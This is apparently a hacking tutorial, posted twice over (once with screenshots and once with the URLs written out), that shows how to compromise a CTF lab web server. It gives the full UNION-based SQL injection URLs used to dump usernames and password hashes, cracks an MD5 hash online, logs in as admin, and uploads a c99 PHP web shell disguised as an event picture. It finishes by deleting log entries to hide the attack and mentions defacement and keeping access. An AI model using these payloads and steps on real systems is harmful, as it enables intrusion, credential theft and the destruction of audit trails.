Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
![[Image: mantrahackbar1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v4EwP8DU41josg7MC4utwcyPGanOHgU6sJmvulVh00HvWGEhMLn8Y5qMKPSg-DtqZjmNxfmrln0GZk3LFDiTqWGjpdpB0HJpPM5HkSfjMFsTHNleNwAX8hbaNfUAgvVYUUJ6VGPMHWUxsgM8H_hFsymC2-XpdV6wE9XLEOr_fR96q8=s0-d)
Step 2:
I went through all the pages of web site and found a page with URL input
![[Image: mantrahackbar2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_unyCOPvYc647Mcgou-Ns8ZONYfFfT3jB7KNc565Rup4A8dnN_YjDs2X1Z7lpf3qGBzGnyjoOOAvzU1IhT4ggQFS9pSwcjIfgCodENSFy0PwUTgEKtqT-4GE9LAyNTKZ_Vkr1D8DRmybLa82YHiU0YWAaNSBRe-oK3rs_DLLE8LPavsBQ=s0-d)
Step 3:
I launched Hackbar by pressing F9
![[Image: mantrahackbar3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vYhkIBdPu1LfO_DEfNgX3kW2CUgr1AhqAyakCKNBrEeuUKMCWvxpLGV_bhuRqSCJzvn9DFEjne5-H3oWXQbNB-nqEB42QcapY60LozJpklyFXFZLWHppBW5GxEd0KnK3dQ2xGd4kgaEZmGMrzRphdPny794fsjooXIClQqFBIYxm7UTQ=s0-d)
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
![[Image: mantrahackbar4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t2R7xxxEegGjv_zvDcxgb5fFPkkQHD8EzOZ9bHSFxFrhi4-Er04seKZVrdPQIqIh1hj1wAtTs-Kb4RkFhW-XTehniWsjUxZZX8UvIKs_wg_gxDV8L7UHLkKf9zWCfCOB9kVGa0v3LUFO-uRA8OFw_OYOKOpqlBz-kA1mEXYoqFmDytPA=s0-d)
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
![[Image: mantrahackbar6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vVXtjekWD88g3tg-Axb9mZhbfTF5r2KhDVdGuzjTnqX_OujQdG3qbO4WE43-lNYcRzzLDkeXfbBV5FqUwrMIDCoHrRx5kroOCAd54QHWNDGOdBxpPoPuCxFHciGa_EJuZzyxt_craExABx0tv1Y2Rw3mWtaKDvb5i2Km_zEVKfxlmdWw=s0-d)
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
![[Image: mantrahackbar7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sjEeXFEK8dOUU8xSHpPzlegKxYDBrEHc-z8Uwv75p06z6FWAl9eZdHGaXWzs6Nu3F_nS_Pk1Vh87yGHR0g9SmghUnCyLuyutBqNDptC0QfYqaToyb8CmshsoFbIWYgDJaLsHLFgb9VnCzeEV2Mb1ea1NPqofpy8WhrZqeFJjQZJDie=s0-d)
Step 7:
I went up to 7 and no change till now
![[Image: mantrahackbar12.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tXfPeU6yFWopnKN1eewoHpKLw4kB_koTOLcqAlOwCe2ftbQoQfvQ3mRoR1XgdLDNzYyOaikKvlIOGqp-XFYhqmC5HnZpcyss8URxRc135vP52XHs_IEElNCDAfcoY_teVBi1aoWN4I2m6JYUyH3j1_iQIidgHDvfIN2sCuShNfJHnAE9w=s0-d)
Step 8:
I'm on 8 now and I can see the page changed
![[Image: mantrahackbar13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tiNYgSGps4rmedHgHnr7fwHdo-acSrhyCMA3YVnqWY0QTrKqaEtlBaNrzJpk1F08T6uq_nYe87j0CGE0-ogohjyv2C9USIi6_OFadOC0ong9oFjnt1IVm-8wBzPqGcYBBfPuO-fDUx_RaU2G-zH9O6hT2nXpqfNIMZ5nn45C2SPCrpZ20=s0-d)
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
![[Image: mantrahackbar14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vEk5U7W2wksuMu7kTdqXfWJ3f1kTJdVuQiccty3aMNEDcwi4TIsuxvOB-mj_MrWv8kRdING3HGwaeAeHDMNh6SclojKVJpshbpf52h3gdEjkIm7UwXnAxwvkIflyqrf2lO4HAnjjNGk0aGsnXagsdVtgwlLAXzqits3LfylK6GMnWIZSw=s0-d)
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
![[Image: mantrahackbar16.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uFj_-Gqqa0IqT5ngUlkoyDO09zfDnIpjYAOzlvZtZFQxRNdhHXehdVKDQ-YiJfkMd3ZMiyeAeWm0gdbmKc53LmkoYo2uh9b2N5uuipV4_eCCHPBzSzCws5RmFxgsrcotKa3VHf1JjgIbZ6LsEeNy1gWD0zkinRVfEodEWWbYfFjMA_Wqc=s0-d)
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
![[Image: mantrahackbar19.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vF1pMOpoXJdPmHYxF23OpOiYN1P5gUMZIfy7kBxikV20AulROtIS6L__3-2qe8L8l65uAVtetcI5esbItMwEpcm58CkEVb8_9nr_PjCXiac71_dUPUvPZgW3Rcxrj5U5O48BkpQL90ijiSSC23cBTgeJeMuzwOcqcJ3jX8DUQdJCJDug=s0-d)
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
![[Image: mantrahackbar21.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uVFMd25vm4BDqd6LlHci_jKk3KaA06R6Gg2QHJxFyn4oIDEII_RB0LIPh7ZsLHZv81ddk9afRcbHHTbUh5pURDPM7wALYIfrG2cNFRONnj3bZZTYMIV1T1XGtuzoN3BDDFExi5BscUXg40ST-xrTTSekwhCFBN_fFrsconVom_FcKorMo=s0-d)
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
![[Image: mantrahackbar22.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tM6ggus9WW5TVTRd_5F_6jlNlUk_gaIOFq6o_2Nirun-za1PiipoNikfOo9CUDjYpUMVZ1DY1gZb4ol_K2UBW7sipXJsSojwK-8FDYph_-q0MpJEFZ_pqR9ojLKOlYLF0ZF2Q3treQ3V3GeVIoHv8MspY7xiP7Fs3CDaI9PulKCFKgfZo=s0-d)
5.0.45 is the version
Step 14:
Let me list all the tables
![[Image: mantrahackbar23.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vdmnVfZykUFhBbZZxrERHw65Thte_9NWi8SAp5E5HUgOa2XjQ5SzrkJw5feQIwyUa4Nfb9IrK0807fyj5UQXMFLRKaz5jQylGEbPKwc90-8ZV9WuKx4aX6Hs4Qg44JrqJ8ADY_hAWd5P_rl7olNsCdQSpSSEwxbdrNaRTBZcUjjaKUuw=s0-d)
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
![[Image: mantrahackbar24.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uuj2y52XW_b1VrUxt6VK8_-VdEF_ItFavvoMfUWEFkLJedKImxIwOXEMvDpLXTOZQHcXb73k2TWHN2RS5a8rS3Ai2OoNcvIVUmk7jJEgExzvbjeLZT1jaC4xcIEka7tKvdPfSRtpgF8lVGNrMfIivhAxQllrW7d8Sq7tqlMKSBk0-n_w=s0-d)
Step 16:
I want columns from the table "user" and nothing else
![[Image: mantrahackbar25.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sKT9bASe6iDgW9ZZnncRqpsZLAASI51RnCBKiZtfYUB92Q0xBGKheTuhbjWfOSMVovfvDs9bVyYbObl-x1MAFES1ZDvfNTayLpA-QF1yzvA37T_55EZxvgnrp9V4jg3ug4PrL8pVREUCNCqNn9V1kSLqG3I2ZUwi1KaWusDImT-EW1uqY=s0-d)
Step 17:
Lets find the user name
![[Image: mantrahackbar27.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tmhXsmmWbKATYgc2oUgE_dwtmgyOtT8t14_qcAn4hgvJmVdD7tE4bf6KFuJz24oU4fQejt0etjnGjaRkcCNywlscxaG_acOo7T2W5mfJgUJmZiRBXSMG-FiGDWaOX0aG0fxbIRyPZGt0-ILc6gh-IKRgv7PnAaDr3cQXHxL3m9TN4q5zE=s0-d)
Step 18:
Now, what about password
![[Image: mantrahackbar26.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t2e1XKsXr7u8vhwkn31Xs2cpqQRfqs1K6j7T8joAGaCsJ5SV6Ohz2ZrCmqp-ypDJh3wbY7bi5o0ihJ4Ds_aMX_NpPdJ-7SCfHkRDF9-7fUUXwOsM5nnFYlGhLFog59dmM0IT-GWN91yLXoiIoo8HMzuRtjCzY-1a-CxBobQ0Eoq8eC_6A=s0-d)
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
![[Image: mantrahackbar30.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vKjRH_X5y63sEgdKzE9H48IKtpG2dvjnygQ3dS0xJYRfkDmoiFLbqJOmn2p3VjwG-uHjg7cz2PrfyJYxOXWrtnmSp0Mhmd7-3qWLYETqy4fCMTohMX1T-U5oOcEZkfIYmS9K0II3JH5On9vpKNIN6HJevoHQqemL1L0y9Zh2Oy_adlKmk=s0-d)
Step 20:
Voila.!!! I got the password
![[Image: mantrahackbar31.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tA_GEPsS0xeOWg0l4K4hkRfl64cL2qB_V6VrdrymWOTVv4SdOTw_LhHJ7y3IKCwNYbUZ5zY52G1fa1KbNFh3CwmOBlSCoZwl6h3k_vbJzTzLzHgINOc8xSuGXexZmazF4Aadghfb_Bz497A4JUmjH8Y6jJRyTVLRVgOnaJsWMkOe-nDT4=s0-d)
Step 21:
Finding the log in page. Its was right in front of me
![[Image: mantrahackbar32.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v31JovwAdhIoiQkjA-OArT5loXsOQCh_kQbd0cDYQ9MdGUDe-JJ2M9D2UnCMrc_m5Pbt-eEcxanAc5Of4osCPKebFpYiOJ1tyo7uORdSi3CHu36SFY2xhNNvThLfQauDpzlcRdc3L6pbqCFhmVlg5sT-CMthiNxbjib_Q4wY9a7xcreCQ=s0-d)
Step 22:
Logging in with the credentials I have
![[Image: mantrahackbar33.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uWBr-egHmLNhO5OGt--Pxw37z3kfwkarki6xlgeL54qak1oF12LW3RbloGrGyS-Re0ZTX5eVWQZoww-yX4g7h9tS3DrkHktE6zPgX8ngBQYH_LuhRNrBTc0rHu4qNZ5oG5calTC5A4w1XQ-176dn5whbbdCG4UwyOvYk-iNoRQkdeHK1E=s0-d)
Step 23:
Greetings.!!!
![[Image: mantrahackbar35.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vlxBeRKhBh1Es3VpjnUt8HyYzOjoeFVIPWFg5SP4rk8nH4DJis4NDMfrsJsUaw6S6N2-vcR-HySRVRCeSjZmAoPKIdtS1hdgcb9nwibrzTBjRMgbbkb2iv3bzY8n-_dZ9cW76mu1aEYWcG6JtS6mG4nWMlMndvCZLLLZlEAkSJkf4pKJc=s0-d)
Step 24:
I'm an admin now. Look at my powers.
![[Image: mantrahackbar36.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_stEmLGZ5kEMo_vP0tEUUhskTqyRskJ8hdrkBpB2hEPh73y_YbYbwTQ2JLm5-mAqWH-_G3B0QjMVqR4WWmEWCzg0ZRoxO-7f1PAoFjJGMYOOdXR_A_2XmbqAlj4SGOUU9Abb8v7gls_LJuI4TNYdUQlb8PkS-AhRt0FHnzlRxsQOKhwzfs=s0-d)
Step 25:
Let me add an event
![[Image: mantrahackbar37.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uajSyhKxBeSZ3nTHVg31wmQlhla12xRyAgccV09icIjMB7tKzjvErxONI5AI3DOCTyAE_scs-ZXTh4gcFk4gFR6r7jKM6eK9L-kWrj846odEmvcayLCrLfTHDerzFACF1xFR2aFRg-uZZSnFx63XHe8qvvP39vXbNrGcMp5XwBv9cKNQ=s0-d)
Step 26:
and of course I want to upload a picture
![[Image: mantrahackbar38.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v0EJy7ic2LevzLGeCEKFsCFtkRh0MheF3O5P-4jp2mXthHhapB5T9jfCaBZx3FduiFE4ck1Dvh2oI8V3NBqvHtOhivlhdiF27wRsJe64KeHNOmESLa6e0lxfm1HStONXAWKoAVZV0V9rFjlvQMMBcVEMFeHh3pk8UQ0Gxls3xkGJyedA=s0-d)
Step 27:
Lets see it allows me to upload the shell or not
![[Image: mantrahackbar39.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u-XKY1PQ43Cj34ZQ9-3rRBaX2Xu0k8sSQGFce9iBCQlr-gB-cRE7tLrmf1pTBydj8s2zPNZ0wcZONs6BljN_AykaaUye7MJoDTeWRbwZpXx78S0JdQRN4npE_vzPn_fJG7wC4ORUN2tnVbfZj2WfnAdNjWkT_FJC40QBKfjXL1vJ4P8lY=s0-d)
Step 28:
Now I'm pressing on "Add Event" button
![[Image: mantrahackbar40.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vufctvpBbvuBzFeFqeJ1UTsh80r4LZuWS9WmkZIMubcmEfS-AtCE_26IDbQMnEvpdZ5N-IHGb64uVGCK3buV_RQTvliDdY8ySqTr-GS2Os4Ttufrk_psxQFpd6oJg57AgaLrubOfZVz_qs5B2ZZ0xW43AhkQMaGYd_o2ROHYkUBM6dl1o=s0-d)
Step 29:
Nice. Looks like it's got uploaded
![[Image: mantrahackbar41.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u0SEaaiYahCYIXWGvj-xwmYPqevaRIRVEg6ARz7Z8CsVj4KiG8XweWNQG2eZXX_Fw6gn-5lFVunEWdwMbUgQEEYyBotGNeDWkXaWczBvOOAZdXxuYDKW2B8h9xOUktEDwTiYj1nqAGbLkEvJrFhxQTItsqQkp8SIqMzkVnMObBxp-sWg=s0-d)
Step 30:
Let's see where the shell got uploaded to
![[Image: mantrahackbar42.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vbcNC-ki5f8xwburP-d0sNSJobGnCHF21wPHa_3hCd7UO_1NUXX1Zmt3EszNwHGrvS2JDiESA2zQoWZF50pTBUy05RNfqIvaxc9YHbuNAhaXbnFm_z6NtQTTjpFPzb-BM7vIHmCZtoUSGYWxg1-VbnZQeifqg7q_kJt9iPrchn3BDqHzI=s0-d)
Step 31:
I'm trying to get the default upload location
![[Image: mantrahackbar43.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_soLb5Pp5wlnnbUV9ngVDFu5kbbdbE8N58lrBTTc92EBmiJDYw29_MAnrIaNJgBF4ibqY3W-MjxFW1jsyyoRx-6ocP_44EtDI3y6PDrh6cwaig7rgFvO6swngFLftEqJtYUAj-t7plnLWvGk1XNTtAi0rULxjUqjvr-r-rLMcc7bZwK_LY=s0-d)
![[Image: mantrahackbar44.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_szGkybxunKp1unucBh9hCEtbRi4auTPoZ7WRIorBeXOJuHoUMWy9AggElsN3YPZ5azmOFTgWMIprhM7y5ELFg0dix7z5MSs2rG7cE7bkjK1qm6n-ltq-ve_F2NwqqTIo5dAtCjLZIVaaMVJTdJ6AAnjqbXAEUuGiwzgafGL1Rx-ViGf9s=s0-d)
Step 32:
Looks like I got it
![[Image: mantrahackbar45.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_trPW1EEE0KIiq4FURl93iJ2nNGBlZ6dq0TV83-gaobf3oF_Ke4wbPVlaxAh1x5azUAQAU4XaqzZkdDNvx7V_w9ksnSVe4pU4H_aGIF4LyH9QfWaMBaa3Whfufs8l1ibAvxVqda5-pBe1Q3TQM2wWdsAMlHMZraYa3aYqp6twO0UvCwSlc=s0-d)
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
![[Image: mantrahackbar46.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tvbbt6EOuRW3X2L0JmbpOGFT1gvdr_57k0ATpBN1vimTH9zVzLXaesiVaext9vg9t-PjqlnKK_9XA-fBoOD1PnN-8tSZCdlUC7obMa2O5zpdAdygcHE5gPupL4oOMtAoXtlkNvvmjD6tLLdcFdbIDFpKC-j00HzMIpAdaE9_BUZQaFM74=s0-d)
Step 34:
I simply clicked on the up button to get the root folder
![[Image: mantrahackbar48.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sxQYRjCl6pIqjmfaRgSbBJLatZl-vWqcSFXWE4sG4SEi-r88DJ2BYYGe6Mq703hfRGyonALH48hOLyoBmoKoCCuuRWeEIqvglAX2iTQHat4M_GXHN0UVvnGIQMVLKmLL1dJcD56DJxgL_HpY3f_bP6f-vZHcjIr6ByHRDGabgA1rNCJCw=s0-d)
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
![[Image: mantrahackbar49.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vrkyrQ4CE7O-6E1sXqHywUkTHhwrFx-2Ajchgl3Q4PiJASz2bndDdY4tE-bBEzSnVs6VuWOLUmlFtIr5f_bEccrr-mgUQJ8A_AcO_x1jRw-rnU_gzfSVqnPrnbatvbcmJ5DeQ56NPxJPBNZsSxQ_7pkr2HzaZpibsBBZsD-S0X6ZrsI4g=s0-d)
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
![[Image: mantrahackbar51.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vyXRWViZVGxFfy_J_Kche6hF8yq3YNQ40bJg1CjiC9vq5SLxtQ9JRHRlcI0T0NNPC9SFHDeHgRbSFV-jW3UGC4Sc1Fv1byyFNq5Sw9SGagPu5SkSzgm_yHCFbyMvj7Cg4dqPtaaOdnHRxN-mA-kewyvDEaoFkyGAm9PrwoNeEZ390bWA=s0-d)
Step 37:
Let me go back and edit the log file
![[Image: mantrahackbar52.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sP2wAFm8-qUBGyxSQC-x_O6bwCF0C8t2WYXex0IGiyzvlqJ3bSoQMt3-KbY9ZsYdvyJeKW4_2vuuunaPZLQAufmRta1Qli50jX3VCv3SHEq60kQ6fLssS4Qfd2htGsydUA4DuH8v50L7ZTRrs1UKRtGDERruHjXS-SZUi8_IcJPcOzImU=s0-d)
![[Image: mantrahackbar53.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uV7qiZ9e2979MM16hj_2p74w9nLEC4YXffSQlZJo0Vw5dIOSLAnaWAEsqGxhzXTFmrGPInXWPpyWU16ss48NDEnukV4hp83SZ485Z736i47P8hZC5r3cQsziCPoBgvc-MhYiNI7F4coWi6H3aDarEHO5AadL2ZfGJLqRdUpP0c0RUn1Q=s0-d)
Step 38:
I deleted complete log entries. Now saving it.
![[Image: mantrahackbar54.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vtXFcx3daa4p3zQbHYDuuyjzlprrIvymIyDQPZGxullyW2heKWada6VN6FkxwskHtJa0vF8yXHkcDP26l4SKi7JFjzkoj2EJffiAusPqricC0YxVTNrSK7NmdXo5ZHmCuTy0BGdy2SMGI9hMZp780oRmSaigsKX-4dOTjpt8FXr6Ratxc=s0-d)
Step 39:
Nice. Log file is empty now
![[Image: mantrahackbar56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_udylBdEmuKoEvrxHHOjT-67IRtNkyL2s_lnEMcX4MEijfDllw7-sHoA1774L7ycUJbHWkd_2jfOuc1RHxN6UzOTrG1LViB1VfrAPiQ5pKkuFGt3OSqWTYZnwSr58Qnn416TAz-0kiO2IOlrsXDoDuWB-FnmfsHVYxTreEF3wkCDfEq3ZM=s0-d)
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
![[Image: mantrahackbar57.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ulOxllcE3K1jRLZlNB1HRIGHdc2zgCbVRun4Jf9Cc5x5YBKDwXTEoQ8C5DV052eK8k3IdKDOs54JqSMW3g-Gv9rZ65xQIq5PjkD69uMqmSX0943RJqt3FkGa7JKz7M3HzQRRh24oyNr7vFeZOftMymLwHZ2Q1Nf3RQX82fb1nKjn0p_Os=s0-d)
Step 41:
Confirmed.!!!
![[Image: mantrahackbar58.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uai_1jcHgeFat7K1vITsIDcmXKLqUHcD-nVvlqIEd-oGFONbUNrm1nXpefCEtxjkZtTYO2zlnrwS9U-BAvFGXPJLqi0UOCgeO9CR9Dfw6TizOZn9_U4WHFN7q2OmVRHEJH90_7i-LV18sM9xtXCGIT32gT5Ll2nf-v-xUYBpCcpaJN1nk=s0-d)
Step 42:
OK. Good Bye C99
![[Image: mantrahackbar59.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tOTjYZuOhLOBnxRKKszzr322We6yJ70DvkAIy-fg4HOJAE0rbfmZFG9Gm5bgwUaBaRX8YoWwE4__DQxFLS5jKVD5dknhB5K8knRmFFFvNlT_2Gy60DeTNIT6Agw49YSqTeuO6qiBday_gvXZQM9ScVlW8Hn_RkTNIZn6JqFjnjQBZQAQ=s0-d)
Step 43:
Well. It got deleted itself
![[Image: mantrahackbar60.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t1mgbbwCEjJiAE3mKl0lhVoKqj9RtM0GSBc0NUvZQN0sBHlJsyYEqEkic624-UaV7JckoIDaaT4EDZ5DLej1wYNfkYGbTj24CYQCQH0N4_ZgWfzqCStA3KRhZVWr7La252M3F41KF3f-SbohNgsSkeyAGngsfwtljOseKJFzwq9eL3Ses=s0-d)
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
http://192.168.132.128/
Step 2:
I went through all the pages of web site and found a page with URL input
http://192.168.132.128/?id=13
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
http://192.168.132.128/?id=13'Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
http://192.168.132.128/?id=13 order by 1Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
http://192.168.132.128/?id=13 order by 7Step 7:
I went up to 7 and no change till now
http://192.168.132.128/?id=13 order by 7Step 8:
I'm on 8 now and I can see the page changed
http://192.168.132.128/?id=13 order by 8Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,75.0.45 is the version
Step 14:
Let me list all the tables
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tablesFrom this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columnsStep 16:
I want columns from the table "user" and nothing else
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'Step 17:
Lets find the user name
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from userStep 18:
Now, what about password
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from userIts encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
H4qqy H4ck!ng
Tags
bypassing